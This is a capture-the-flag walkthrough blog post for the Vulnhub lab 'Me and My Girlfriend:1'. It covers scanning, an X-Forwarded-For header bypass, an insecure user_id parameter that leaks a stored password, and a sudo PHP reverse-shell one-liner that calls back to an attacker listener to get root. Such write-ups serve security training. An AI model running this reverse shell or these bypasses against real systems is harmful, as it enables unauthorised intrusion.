Me and My Girlfreind:1 Vulnhub Walkthrough

Me and My Girlfriends is another CTF challenge given by vulnhub and the level difficultly is set according to beginners. You have to hunt two flags, and this is a boot to root challenge.

According to author: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company.

Download it from here.

Penetration Testing Methodologies

Network Scanning

  • Netdiscover
  • Nmap

Enumeration

  • Burp Suite

Spawning shell

  • ssh

Privilege Escalations

  • Sudo right

Walkthrough

Network Scanning

First of all, we try to identify our target. We did this using the netdiscover command.

Now that we have identified our target using the above command, we can continue to our next step i.e. scanning the host IP to identify open ports and running services. We will use Nmap to scan the target with the following command:

nmap -p- -A 192.168.29.148

We found port 22, 80 are open for ssh and HTTP respectively, let’s go for enumeration.

Enumeration

When you will explore machine IP in the web browser, you will see a message “this site can only be accessed local” which is a hint given by author that means the wep page will be accessible locally.

Then I check for source page and notice the comment “to use x-forwarded-for header” to access the page, here we can say that there is possibility of host header injection 😊.

Without wasting time, I had edited the rule for the request header for x-forwarded-for: localhost in the burp suite and try to intercept the web page request along this.

Once you have intercepted request, further you need to forward this request again and again till you receive the response on the web browser.

And finally, you will be able to access the web page for the Ceban Corp company as said by author. At this page I saw 4 captions that contains some hyperlink. Here I tried to figure out the possibilities for sql injection and LFI but failed to bypass this.

Since I was failed to enumerate any vulnerability, thus, register a new account by name of raj.

Then login as raj to investigate further.

Once I logged in, I saw another their three captions “Dashboard, Profile, logout”. The profile caption denoted user_id and for raj it is showing user-id=12 in the URL.

In the given URL, I tried to change user_id from user_id=12 to user-id=1 and luckily I saw  the profile for another user, then frequently found profile for alice as user_id=5, Moreover the password field was auto filed thus I was able to read the password from inside the inspect element.

Thus, I have following creds:

Username: alice
Password: 4lic3

Spwaning shell

Since we have enumerated credential for the user alice therefore, further I used this credential to access host machine shell through ssh.

ssh alice@192.168.29.148

After spawning pty shell of the host machine, I looked for directory list where I found a hidden folder named as “.my_secret” which contains two files: flag1.txt and my_notes.txt.

Thus, we have found 1st flag, now let’s move forward for privilege escalation and capture the 2nd flag.

Privilege Escalation

Without wasting time, I looked for sudo rights and fortunately found that alice can run the php program as sudo user. Then I start the netcat listener in a new terminal and run the php reverse shell command in the host terminal.

sudo /usr/bin/php -r '$sock=fsockopen("192.168.29.157",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Boomm!! We got the root shell through netcat session and inside the root we found the final flag.

nc -lvp 1234
cd /root
ls
cat flag2.txt

Author: Pinky Deka is trained in Certified Ethical hacking and Bug Bounty Hunter. Connect with her here

The post Me and My Girlfreind:1 Vulnhub Walkthrough appeared first on Hacking Articles.



from Hacking Articles https://ift.tt/2PVn8Qi